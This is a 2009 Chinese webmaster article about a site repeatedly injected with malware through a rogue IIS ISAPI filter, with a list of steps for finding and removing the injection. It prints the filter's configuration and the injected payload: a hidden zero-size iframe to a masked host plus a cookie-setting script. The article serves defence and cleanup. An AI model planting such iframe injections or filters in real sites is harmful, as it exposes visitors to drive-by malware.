当前位置: 首页 > 图文教程 > 网站运营 > 建站经验 > 个人站长在网站被挂马后的应对办法

建站经验
推广经验 利用QQ推广网站的方法
google 恶意软件网站 警告后 怎么办
站长浅谈 运营网站切勿盲目跟风
远离垃圾站 做一个有用的站 让人们需要你
站长想把网站做好需要专心
让百度蜘蛛认为你的网站是一个好网站
企业网站 建设目标分析
问答推广的实施步骤与问答推广方法和技巧
SEO B2B行业网站优化经验
搜索引擎算法调整和被搜索引擎惩罚的解决方法
选择不知名网站源码来建站选择技巧
digg 创始人经验分享 发展网站用户的9个方法
智能查询域名的10个国外网站
成功网站的法则 简单的直击人最基本需求
网站 邀请机制的使用说明
成功网站=充实的内容+勤奋的站长+运气
网站内容的主动组织和展示技巧
百度K站和降权原因大收集 看看你占了哪一条
网络媒体 让资讯与服务融为一体
网站运营 SNS社区产品设计思想

建站经验 中的 个人站长在网站被挂马后的应对办法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-17   浏览: 51 ::
收藏到网摘: n/a

最近实在头疼,我的网站www.haorx.com,反复被一个www.17aq.com的网站挂马,一打开网站后,马上就会要你安装一个什么软件,我打开17aq的网站,准备查一下联系方式,告诉人家别在我的网站上挂马。但人家根本就没有页面,显然是一个挂马的网站,怎么办(请各位看官给我支个招)?

下面我说一下,我找这个马的过程:

现象是一台服务器几乎所有网站打开网页 甚至HTML网页 都出现了

《iframe src=“http://www.XXXXXXXXXXXXX.com/mmmmmmm.htm” height=0 width=0》《/iframe》 这种样式的代码 一般在头部部分杀毒软件打开会报毒

打开HTML或ASP PHP页面在源码中怎么也找不到这段代码起初会怀疑是JS,找了半天还是没有发现,连新建的HTML页面也会有这段代码~

仔细寻找问题应该在IIS上,打开IIS重新启动一次在主IIS上右键属性-----ISAPI,发现一个ISAPI扩展,没见过的,路径为:c:\windows\help\wanps.dll ,ISAP加载正常绿色状态,取消重新启动IIS,所有代码消失。

可以判断就是这个文件在作怪,提取出来就是者三个文件

wanps.ini内容为:

[Filter]

Cookie=GAG5=ABCDEFG

Redirector=C:\windows\help\wanps.txt

wanps.txt内容为:

《body》

《iframe src=“http://www.XXXXXX.com/mm.htm” height=0 width=0》《/iframe》

《script language=“javascript”》

《!--

var expires = new Date();

expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);

document.cookie=“GAG5=ABCDEFG;expires=”+expires.toGMTString();

--》

《/script》

《/body》

打此为此,马算是解决了,但后门肯定已经被人家掌握了,我清除马以后,过一段时间,又被人家挂上马了。哎~~~~

在网上查到一些解决挂马的办法,附上,希望对大家有用

首先发现自己访问多个站点被挂马以后需要按以下流程操作解决

1、迅速访问www.baidu.com看BAIDU是否被挂马,用于排除自己的PC中病毒引起的问题。如果你访问www.baidu.com也是被挂马的话,那你就杀毒就可以了!熊猫烧香好象应用了类似的预防被杀掉的措施。

2、迅速登陆FTP或者进入服务器查看相关文件是否被写入了代码,如果被写入代码那就找规律清除吧,某些黑客用批量文本替换工具挂的马,所以你找到替换字符,替换回来就可以迅速解决。

3、如果以上两个方案都没解决,迅速打开IIS,查看仔细寻找 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的 ISAP加载正常 绿色状态 取消 重新启动IIS 所有代码消失

4、如果还没有解决,那你就可以放心了,不是你的机器被入侵了,速速告诉机房,和你同一网关下的某机器被拿下来,被设置了ARP欺骗。这个现象就是包括服务器的404页面都被挂了马。你可以在防火墙里设置一些规则来避免掉。我所说的这个方法也是现在最流行的挂马的方法!